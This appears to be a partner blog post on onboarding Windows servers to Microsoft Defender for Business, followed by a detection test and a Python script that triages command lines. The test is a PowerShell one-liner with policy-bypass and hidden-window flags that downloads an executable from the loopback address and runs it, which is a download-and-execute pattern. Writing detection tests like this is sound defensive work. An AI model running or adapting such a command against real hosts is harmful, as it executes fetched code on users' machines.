Microsoft EDR Solution: Step-by-Step Onboarding Guide
Overview
Microsoft EDR is a comprehensive and integrated EDR solution that leverages the capabilities of Microsoft Defender for Endpoint, Microsoft 365 Defender, and Azure Sentinel. It provides organizations with complete visibility, detection, investigation, and response capabilities across their endpoint environment. It also offers several advantages over other EDR solutions, such as comprehensive coverage, integrated functionality, cloud-based delivery, cost-effectiveness, and ease of use.
This blog post gives you a brief overview of Microsoft Defender for Business, its benefits, and its installation procedure.
What is Microsoft Defender for Business?
Cybersecurity is a top priority for any business in the digital age. Cyberattacks can cause significant damage to your reputation, productivity, and bottom line. That’s why you need a comprehensive and reliable solution to safeguard your data, devices, and network from malicious actors.
Microsoft Defender for Business is one of the best options available today. It is a cloud-based security platform that integrates with Microsoft 365 and Azure to provide end-to-end protection for your organization.
Benefits
Microsoft Defender for Business offers a range of features and benefits that make it a superior choice for your cybersecurity needs. Here are some of them:
- Leverages artificial intelligence and machine learning to detect and respond to threats in real time. It uses advanced behavioral analytics and threat intelligence to identify and block known and unknown attacks, such as ransomware, phishing, and zero-day exploits.
- Enables you to manage your security posture from a single dashboard. You can easily monitor and control your devices, applications, data, and identity across your entire organization. You can also set policies and rules to enforce compliance and best practices.
- Empowers you to prevent data breaches and data loss. It encrypts your data at rest and in transit and allows you to control who can access it and how. It also helps you recover your data in case of an incident, with built-in backup and restore capabilities.
- Supports your remote workforce and hybrid work environment. It allows you to secure your devices and data wherever they are, whether on-premises or in the cloud. It also integrates with Microsoft Teams and other collaboration tools to enable secure communication and teamwork.
- Reduces your costs and complexity. It eliminates the need for multiple security products and vendors and simplifies your security management and operations. It also offers flexible pricing options that suit your budget and needs.
Onboarding Microsoft Defender for Business on Windows Servers
To install Microsoft Defender for Business on Windows servers:
- Log in to the Microsoft Defender portal https://security.microsoft.com/ with Admin credentials.
- In the left pane, go to Settings, then click Endpoints.
- In the Endpoints page, under Device Management, click Onboarding.
- In the Select operating system to start onboarding process dropdown, choose the respective server OS. For example, Windows Server 1803, 2019 and 2022.
- In the Onboard a device section, click the Deployment Method dropdown, and then choose Group Policy.
- Click Download the Onboarding package to download it to the respective server. This downloads the OptionalParamsPolicy folder and the WindowsDefenderATPOnboardingScript file.
- Double-click the WindowsDefenderATPOnboardingScript file to run the script. The Windows protected your PC dialog box appears.
- Click More info.
- Click Run anyway.
It takes a while to onboard the device.
Running a Detection Test
To verify that the device is properly onboarded and reporting to the service, run the detection script on the newly onboarded device:
- Open a Command Prompt window.
- In the prompt, copy and run the command below.
powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference= 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\test-WDATP-test\\invoice.exe');Start-Process 'C:\\test-WDATP-test\\invoice.exe'
The Command Prompt window closes automatically.
If successful, the detection test will be marked as completed and a new alert will appear in a few minutes.
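The test command targets http://127.0.0.1, so it only imitates a download-and-run sequence. The following added example (not Microsoft's detection logic and not part of the original post) shows how an analyst could triage process command lines for that same sequence and separate the onboarding test from a look-alike; the trait names, verdict labels, and sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlparse

# Constructed sample command lines, as a process-creation log might record them.
TEST_CMD = (r"powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden "
            r"$ErrorActionPreference= 'silentlycontinue';(New-Object System.Net.WebClient)"
            r".DownloadFile('http://127.0.0.1/1.exe', 'C:\\test-WDATP-test\\invoice.exe');"
            r"Start-Process 'C:\\test-WDATP-test\\invoice.exe'")
# Same command with a placeholder non-loopback host (reserved .test name).
REMOTE_CMD = TEST_CMD.replace("127.0.0.1", "files.example.test")
BENIGN_CMD = r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"

DOWNLOAD = re.compile(r"\.DownloadFile\(\s*'([^']+)'\s*,\s*'([^']+)'\s*\)", re.I)
START = re.compile(r"Start-Process\s+'([^']+)'", re.I)
LOOPBACK = {"127.0.0.1", "localhost", "::1"}


def analyze(cmdline):
    """Return (verdict, traits) for one PowerShell command line."""
    traits = []
    if re.search(r"-(ExecutionPolicy|ep)\s+Bypass", cmdline, re.I):
        traits.append("execution-policy-bypass")
    if re.search(r"-(WindowStyle|w)\s+Hidden", cmdline, re.I):
        traits.append("hidden-window")

    host = None
    download = DOWNLOAD.search(cmdline)
    if download:
        traits.append("web-download")
        host = urlparse(download.group(1)).hostname
        # Download-then-execute: Start-Process launches the file just written.
        started = {path.lower() for path in START.findall(cmdline)}
        if download.group(2).lower() in started:
            traits.append("runs-downloaded-file")

    if "runs-downloaded-file" not in traits:
        return "no-download-execute", traits
    if host in LOOPBACK:
        # Source is the local machine, as in the onboarding detection test.
        return "likely-onboarding-test", traits
    return "investigate", traits


if __name__ == "__main__":
    for name, cmd in [("test", TEST_CMD), ("remote", REMOTE_CMD), ("benign", BENIGN_CMD)]:
        print(name, *analyze(cmd))
```

A loopback source only makes the onboarding test the likely explanation; confirm against the time the test was run on that device before closing the alert.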
Microsoft Defender for Business is a powerful and comprehensive security solution that can help you protect your organization from cyber threats. If you want to learn more about how it works and how it can benefit you, contact us today. We are a certified Microsoft partner and we can help you implement and optimize Microsoft Defender for Business for your business.